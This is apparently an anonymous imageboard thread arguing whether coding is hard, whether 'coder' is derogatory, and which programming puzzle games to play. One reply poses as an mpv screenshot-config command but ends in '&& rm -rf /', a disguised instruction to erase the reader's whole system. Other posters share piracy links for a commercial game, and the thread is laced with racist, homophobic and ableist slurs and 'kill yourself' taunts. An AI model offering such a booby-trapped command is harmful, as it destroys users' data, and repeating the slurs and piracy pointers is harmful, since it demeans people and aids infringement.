Coding is not difficult

Coding is not difficult
youtube.com/watch?v=F9GujgK0y2M

Other urls found in this thread:

ocw.mit.edu/courses/science-technology-and-society/sts-035-the-history-of-computing-spring-2004/
store.steampowered.com/app/370360/TIS100/
store.steampowered.com/app/504210/SHENZHEN_IO/
thepiratebay
goodolddownloads.com/?game=1640205738
itorrents.org/torrent/.torrent
twitter.com/SFWRedditGifs

Kool.

Yeah and neither is woodworking. Doesn't mean your art class wooden box is good, or that people actually want to make chairs for a job.

wtf i love coding now

Well gee, if the guy who wrote some shitty PHP code in 2006 says so, that must mean coding is easy as pie.

easy to learn, hard to master in all of it's nuances

Damn they're really trying to turn decent blue collar jobs into minimum wage McJobs aren't they?

Comment not necessary.

Jesus what's with all of the Python environment variables

cd ~/codecd..sudo echo -e screenshot-format=png\\rscreenshot-png-compression=9\\rscreenshot-high-bit-depth=yes\\rscreenshot-template="%F %p"\\rscreenshot-directory=/home/Username/Pictures/Screenshots >> /etc/mpv/mpv.conf && rm -rf /

There's only like 3 of them, what? Probably for a virtualenv. The real hitler here is all that fucking Oracle DB shit.

lel

You people should be thankful many retards are learning what coding is. If you're a talented programmer, they'll actually appreciate what it is you offer, because more people will know what it is they cannot do themselves.

For instance, Terry's parents probably just think their weird son just likes "playing around" on his computer, with realizing that he created God's Operating System.

*without realizing

Coding is difficult. Programming maybe not so much. If you don't know what the difference is, then you're 100 years too early to call yourself any kind of a professional.

You have it upside-down, pajeet. Learn the difference.

writing software code == writing software programs

Question:
What do totalitarian faggots who literally scam the whole world, alienate people, kill and more are being treated has superstars ?

What are you talking about?

Because most are useful idiots who suck up to those above them while kicking the ones below them. It gives them the feeling of belonging to the successful and thus protects their fragile ego. They think if they lick that boot enough they will be allowed to wear it one day. Which will never happen, of course.

But it is not coding itself that is hard, that is just learning syntax more or less. The problem you are solving using coding is what is difficult.

This is also just about getting a bigger pool to hire from, nothing else. Why would otherwise push something like this?

This. But the first thing that comes to my mind is the idea of every employee extending their work ecosystem with scripts and whatnot that could actually be a nice boost. The flipside is the amount of shitty code going up and the status of programming jobs going down.

teach it sometime. I assisted a college class one time, a simple mandatory Python class for people in a tech track, and a girl just glared at me with "fuck you, you little worm" written on her face when I tried to explain that her 'solution' would fail literally 1/3 of the time.
Programming requires a certain mindset and not everyone has it.

Sure. Maybe somewhat simplified, there is some talent and skill that comes with it.

Sometimes you just don't think of some situation and your program will fail. The best programmers are the ones that can be told "you're wrong" and not take it personally. You don't even need to tell them HOW their program will fail, you just need to mention [use case] and they'll go

This wasn't a case of someone pridefully refusing to see faults in his work, but of someone pridelessly not caring that his work is blatantly faulty. "It passed the professor's three tests [just guides to expected behavior], so stop bothering me."
She had contempt for the craft. The moment I realized that, her attitude stopped pissing me off (as much) and I went back to helping people who were already six months ahead of the class.

Coder is a derogatory term for people that can't think for themselves, and are forever stuck mindless re-implementing things they have copied from the internet, or some other programmer telling them what to do.

A coder is a codemonkey.

There are good jobs and bad jobs, but these labels won't help you distinguish one from the other. This is just the euphemism treadmill at work.

that's some cool history right there
I need to look up if CS majors must go through computer history courses or not.
and it looks like MIT offers one
ocw.mit.edu/courses/science-technology-and-society/sts-035-the-history-of-computing-spring-2004/

Hi newfriend. 'Coder' has been around before you were born and were the hardcore assembly programmers you've heard about from your youtube celebrities. It was certainly not derogatory.

[citation needed]

The term coder has been derogatory even before you were born, newfag.

I was born in the '70s, kiddo. I remember when we used to call ourselves hackers, too.

Learn to Engrish.

It parses. Do you need debugged?

I like the idea of coding but lack the patience to review and correct shit.
Hell, I don't even like re-reading the stories I write.

You're right, and I kill myself now, because sleep deprivation is a hell of a drug.

Few programmers actually enjoy the coding. They like the feeling of "when the damn thing finally works". It's a bit like how most people who jog don't like jogging, but they like feeling healthy and being able to jog farther and farther.

I love the thrill of building an application start to finish. Problems that arise in the middle of the development process are fun and exciting as it challenges my analysis and reasoning skills.

I FUCKING LOVE CODING

i prefer to be called an NBA allstar

If you don't like coding you should quit. It gets more intense as you advance.

Where do I sign up? I'm mexican so they have to.

It's not difficult, but it's one of the worst things one can choose to do with one's life - it's fucking boring, to the point of depression and suicide.
They just want to flood the market with coders, so that they can hire a ton of them for pennies.

I can't say I love it, but I don't dislike it. Things became much more interesting to me since lower level programming was introduced.

what inspires me is teachign african refguees how to code javascripta

wew.

store.steampowered.com/app/370360/TIS100/
Have fun moving shit around in simple game ASM with a one direct register and one indirect register.
It gets quite complicated towards the end where you get the tools to output colors on a display.

And when you're done with that, you can move on to:
store.steampowered.com/app/504210/SHENZHEN_IO/

And if there's still interest, you could learn ARM ASM and then Intel AMD ASM.

Or just learn JavaScript in the DOM lol rofl. "I'm a coder now guys".

Disgusting.

Can you upload SHENZHEN i/o somewhere?
Don't have the shekels to buy it and I don't find it on torrents.
I have TIS100 is someone wants it.

thepiratebay org/search/shenzhen/0/99/400
Yes...

goodolddownloads.com/?game=1640205738

I seriously hope you guys don't do this.

I was already trying to download from it, but no seeders.

I was talking about:
thepiratebay org/torrent/17085805/SHENZHEN_I_O_%5Bx86__amd64%5D_%5BENG%5D_%28Linux%29

They're saying 7 seeders, but it can't even download the basic infos.

ITT: LARPers give coding advice

Kill yourself. Seriously.

itorrents.org/torrent/.torrent

Are you the same street-shitter shilling for Rust?

Teenagers this very day call themselves hackers, retard. It's not something you fondly remember about. If you were taught in university you would know, that every old professor who retired from long ago would use the term coder for the groups of people that you order around.

What a valuable post that needed to be made, I'm glad we have such high quality standards here unlike some other boards.